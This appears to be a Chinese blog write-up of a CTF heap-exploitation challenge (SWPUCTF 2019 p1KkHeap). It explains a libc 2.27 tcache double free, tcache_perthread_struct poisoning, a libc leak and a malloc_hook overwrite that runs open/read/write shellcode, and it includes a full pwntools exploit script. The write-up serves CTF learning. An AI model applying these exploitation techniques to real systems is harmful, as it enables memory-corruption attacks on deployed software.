我的技术与生活——SWPUCTF_2019_p1KkHeap

所有操作总共限制在了0x12次

保护全开，限制了堆的大小在0x100，不能绕过tachebin机制

dele时没有将bss段上的堆指针清零，存在double free漏洞

最多只能申请8次堆

本想泄露堆的地址然后改size泄露地址，但是最后的dele会报错，不知道什么原因，而且申请的次数根本不够用，所以这个方法不行。

add(0x40) #0
add(0x40) #1
add(0x10) #2
add(0x10) #3
dele(0)
dele(1)
dele(0)
show(0)
p.recvuntil('content: ')
m0_addr=u64(p.recv(6).ljust(8,'\x00'))
print(hex(m0_addr))
#add(0x10,)
add(0x40)
edit(4,p64(m0_addr+0x50))
add(0x40)
add(0x40)
add(0x40)
payload=p64(0)*3+p64(0x421)
edit(7,payload)

这里libc2.27有一种特性，tcache_perthread_struct结构体在堆上，释放后大小在0x20到0x410的堆的地址会放在开始的0x250的堆那里，这里释放了三个堆，从0x557386b4a010开始，他是小端序存储放到了后边，第一个字节是0x10大小的堆的数量，然后依次是0x20,最多放7个，放完就放fastbin和unsortedbin里。

在主函数里有一个函数

它映射了一个地址在0x6666000，那么这道题很明显用shellcode写，把shellcode写在这个地址然后执行

首先先计算出tcache_perthread_struct结构体的地址，这里可以直接对一个堆释放两次

add(0x100)
add(0x100)
dele(1)
dele(1)
show(1)
p.recvuntil('content: ')
tache_addr=u64(p.recv(6).ljust(8,'\x00'))-0x360
print(hex(tache_addr))

再申请堆就能直接修改堆指针,改到tache_perthread_struct开始的地址

1 2	add(0x100) #2 edit(2,p64(tache_addr))

再申请两次，在tache_perthread能改到下面的地址,相对开始的偏移是0xc8,这里不太清楚为什么改到下面的bin指针，应该和堆管理器有关

add(0x100)  #3
add(0x100)  #4
vmmap=0x66660000
edit(4,0xb8*'\x00'+p64(vmmap))

再申请堆，在0x66660000这个地址上写上shellcode，这里看到shellcode的大小是大于0x30的，至于为什么地址是0x66660300,其实后面改成shellcode以后的地址都可以，比如0x66660040以后

add(0x100)  #5
shellcode=shellcraft.open('flag',0)
shellcode+=shellcraft.read(3,0x66660300,0x30)
shellcode+=shellcraft.write(1,0x66660300,0x30)
edit(5,shellcode)

当tache_perthread的size为0但所对应的首地址不为空时，再分配出去size会变成0xff大于7，再dele(0)会放在unsortedbin，因为大于0x80，此时可以泄露main_arena+96的地址，这个地址减0x70就是malloc_hook的地址

dele(0)
show(0)
p.recvuntil('content: ')
malloc_hook=u64(p.recv(6).ljust(8,'\x00'))-0x70
print(hex(malloc_hook))

再以相同的方式改掉tachebin的地址

1	edit(4,0xb8*'\x00'+p64(malloc_hook))

再申请一次0x100大小的堆，edit内容为0x66660000的地址，再申请一次堆即可提权

exp

from pwn import*
from LibcSearcher import *
#p=remote("node4.buuoj.cn",)
p=process("./SWPUCTF_2019_p1KkHeap")
context.update(arch='amd64', os='linux', endian='little')
context.log_level="debug"
libc=ELF('./libc-2.27.so')
def add(size):
    p.sendlineafter('Your Choice: ','1')
    p.sendlineafter('size: ',str(size))

def show(index):
    p.sendlineafter('Your Choice: ','2')
    p.sendlineafter('id: ',str(index))

def edit(index,content):
    p.sendlineafter('Your Choice: ','3')
    p.sendlineafter('id: ',str(index))
    p.sendlineafter('content: ',content)

def dele(index):
    p.sendlineafter('Your Choice: ','4')
    p.sendlineafter('id: ',str(index))

add(0x100)  #0
add(0x100)  #1
dele(1)
dele(1)
show(1)
p.recvuntil('content: ')
tache_addr=u64(p.recv(6).ljust(8,'\x00'))-0x360
print(hex(tache_addr))
add(0x100)  #2
edit(2,p64(tache_addr)*2)

add(0x100)  #3
add(0x100)  #4
vmmap=0x66660000
edit(4,0xb8*'\x00'+p64(vmmap))
add(0x100)  #5
shellcode=shellcraft.open('flag',0)
shellcode+=shellcraft.read(3,0x66660300,0x30)
shellcode+=shellcraft.write(1,0x66660300,0x30)
edit(5,asm(shellcode))

dele(0)
show(0)
p.recvuntil('content: ')
malloc_hook=u64(p.recv(6).ljust(8,'\x00'))-0x70
print(hex(malloc_hook))
#dele(0)

edit(4,0xb8*'\x00'+p64(malloc_hook))

add(0x100)  #6
edit(6,p64(vmmap))

add(0x100)
gdb.attach(p)
sleep(1)

p.interactive()

站点信息

SWPUCTF_2019_p1KkHeap

所有操作总共限制在了0x12次

保护全开，限制了堆的大小在0x100，不能绕过tachebin机制

dele时没有将bss段上的堆指针清零，存在double free漏洞

最多只能申请8次堆

本想泄露堆的地址然后改size泄露地址，但是最后的dele会报错，不知道什么原因，而且申请的次数根本不够用，所以这个方法不行。

在主函数里有一个函数

它映射了一个地址在0x6666000，那么这道题很明显用shellcode写，把shellcode写在这个地址然后执行

首先先计算出tcache_perthread_struct结构体的地址，这里可以直接对一个堆释放两次

再申请堆就能直接修改堆指针,改到tache_perthread_struct开始的地址

再申请两次，在tache_perthread能改到下面的地址,相对开始的偏移是0xc8,这里不太清楚为什么改到下面的bin指针，应该和堆管理器有关

再申请堆，在0x66660000这个地址上写上shellcode，这里看到shellcode的大小是大于0x30的，至于为什么地址是0x66660300,其实后面改成shellcode以后的地址都可以，比如0x66660040以后

当tache_perthread的size为0但所对应的首地址不为空时，再分配出去size会变成0xff大于7，再dele(0)会放在unsortedbin，因为大于0x80，此时可以泄露main_arena+96的地址，这个地址减0x70就是malloc_hook的地址

再以相同的方式改掉tachebin的地址

再申请一次0x100大小的堆，edit内容为0x66660000的地址，再申请一次堆即可提权

exp

评论区

目录

公告栏